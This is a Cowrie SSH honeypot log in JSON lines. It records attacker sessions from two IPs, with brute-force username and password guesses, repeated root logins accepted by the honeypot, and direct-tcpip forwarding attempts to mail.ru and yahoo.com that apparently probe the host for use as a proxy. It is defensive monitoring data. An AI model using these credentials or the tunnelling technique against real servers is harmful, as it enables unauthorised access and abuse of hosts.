{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:00.291444Z","src_ip":"77.83.207.83","session":"ec44352f9475"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:00.543349Z","src_ip":"77.83.207.83","session":"ec44352f9475"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":16592,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:16592","sensor":"my-vps","timestamp":"2025-08-31T03:48:00.594743Z","session":"ec44352f9475"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:00.645452Z","src_ip":"77.83.207.83","session":"ec44352f9475"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":6278,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:6278","sensor":"my-vps","timestamp":"2025-08-31T03:48:00.788664Z","session":"ec44352f9475"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:00.839087Z","src_ip":"77.83.207.83","session":"ec44352f9475"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":11629,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:11629","sensor":"my-vps","timestamp":"2025-08-31T03:48:00.980618Z","session":"ec44352f9475"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:01.031035Z","src_ip":"77.83.207.83","session":"ec44352f9475"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:01.082995Z","src_ip":"77.83.207.83","session":"ec44352f9475"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":64708,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c5d0f4e5b97","protocol":"ssh","message":"New connection: 77.83.207.83:64708 (1.2.3.4:22) [session: 8c5d0f4e5b97]","sensor":"my-vps","timestamp":"2025-08-31T03:48:01.132798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:01.133608Z","src_ip":"77.83.207.83","session":"8c5d0f4e5b97"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:01.184593Z","src_ip":"77.83.207.83","session":"8c5d0f4e5b97"}
{"eventid":"cowrie.session.closed","duration":"44.9","message":"Connection lost after 44.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:01.211890Z","src_ip":"212.227.235.229","session":"56880aaea8ae"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:01.438392Z","src_ip":"77.83.207.83","session":"8c5d0f4e5b97"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":24984,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:24984","sensor":"my-vps","timestamp":"2025-08-31T03:48:01.490869Z","session":"8c5d0f4e5b97"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:01.543887Z","src_ip":"77.83.207.83","session":"8c5d0f4e5b97"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45097,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb2763f56c6c","protocol":"ssh","message":"New connection: 212.227.125.160:45097 (1.2.3.4:22) [session: bb2763f56c6c]","sensor":"my-vps","timestamp":"2025-08-31T03:48:01.684395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T03:48:01.685282Z","src_ip":"212.227.125.160","session":"bb2763f56c6c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":20533,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:20533","sensor":"my-vps","timestamp":"2025-08-31T03:48:01.689577Z","session":"8c5d0f4e5b97"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:01.740497Z","src_ip":"77.83.207.83","session":"8c5d0f4e5b97"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T03:48:01.766499Z","src_ip":"212.227.125.160","session":"bb2763f56c6c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":31199,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:31199","sensor":"my-vps","timestamp":"2025-08-31T03:48:01.885242Z","session":"8c5d0f4e5b97"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:01.936237Z","src_ip":"77.83.207.83","session":"8c5d0f4e5b97"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:01.988058Z","src_ip":"77.83.207.83","session":"8c5d0f4e5b97"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":64810,"dst_ip":"1.2.3.4","dst_port":22,"session":"8821f74c2357","protocol":"ssh","message":"New connection: 77.83.207.83:64810 (1.2.3.4:22) [session: 8821f74c2357]","sensor":"my-vps","timestamp":"2025-08-31T03:48:02.037248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:02.038248Z","src_ip":"77.83.207.83","session":"8821f74c2357"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:02.088599Z","src_ip":"77.83.207.83","session":"8821f74c2357"}
{"eventid":"cowrie.login.failed","username":"yue","password":"yue","message":"login attempt [yue/yue] failed","sensor":"my-vps","timestamp":"2025-08-31T03:48:02.171718Z","src_ip":"212.227.125.160","session":"bb2763f56c6c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:02.339138Z","src_ip":"77.83.207.83","session":"8821f74c2357"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":28881,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:28881","sensor":"my-vps","timestamp":"2025-08-31T03:48:02.391128Z","session":"8821f74c2357"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:02.441776Z","src_ip":"77.83.207.83","session":"8821f74c2357"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":29272,"dst_ip":"1.2.3.4","dst_port":22,"session":"124b28fd63c8","protocol":"ssh","message":"New connection: 212.227.125.160:29272 (1.2.3.4:22) [session: 124b28fd63c8]","sensor":"my-vps","timestamp":"2025-08-31T03:48:02.443803Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":27493,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:27493","sensor":"my-vps","timestamp":"2025-08-31T03:48:02.584567Z","session":"8821f74c2357"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:02.634957Z","src_ip":"77.83.207.83","session":"8821f74c2357"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":6074,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:6074","sensor":"my-vps","timestamp":"2025-08-31T03:48:02.776493Z","session":"8821f74c2357"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:02.826762Z","src_ip":"77.83.207.83","session":"8821f74c2357"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:02.878163Z","src_ip":"77.83.207.83","session":"8821f74c2357"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":64907,"dst_ip":"1.2.3.4","dst_port":22,"session":"44e7d7037f5e","protocol":"ssh","message":"New connection: 77.83.207.83:64907 (1.2.3.4:22) [session: 44e7d7037f5e]","sensor":"my-vps","timestamp":"2025-08-31T03:48:02.927001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:02.927749Z","src_ip":"77.83.207.83","session":"44e7d7037f5e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:02.978271Z","src_ip":"77.83.207.83","session":"44e7d7037f5e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T03:48:03.120764Z","src_ip":"212.227.125.160","session":"124b28fd63c8"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T03:48:03.179316Z","src_ip":"212.227.125.160","session":"124b28fd63c8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:03.229009Z","src_ip":"77.83.207.83","session":"44e7d7037f5e"}
{"eventid":"cowrie.login.failed","username":"yue","password":"abc123","message":"login attempt [yue/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:48:03.254745Z","src_ip":"212.227.125.160","session":"bb2763f56c6c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":8581,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:8581","sensor":"my-vps","timestamp":"2025-08-31T03:48:03.280931Z","session":"44e7d7037f5e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:03.331207Z","src_ip":"77.83.207.83","session":"44e7d7037f5e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":9036,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:9036","sensor":"my-vps","timestamp":"2025-08-31T03:48:03.472832Z","session":"44e7d7037f5e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"ZZ8807zpl","message":"login attempt [admin/ZZ8807zpl] failed","sensor":"my-vps","timestamp":"2025-08-31T03:48:03.497399Z","src_ip":"212.227.125.160","session":"124b28fd63c8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:03.523592Z","src_ip":"77.83.207.83","session":"44e7d7037f5e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":18082,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:18082","sensor":"my-vps","timestamp":"2025-08-31T03:48:03.668690Z","session":"44e7d7037f5e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:03.719033Z","src_ip":"77.83.207.83","session":"44e7d7037f5e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:03.770636Z","src_ip":"77.83.207.83","session":"44e7d7037f5e"}
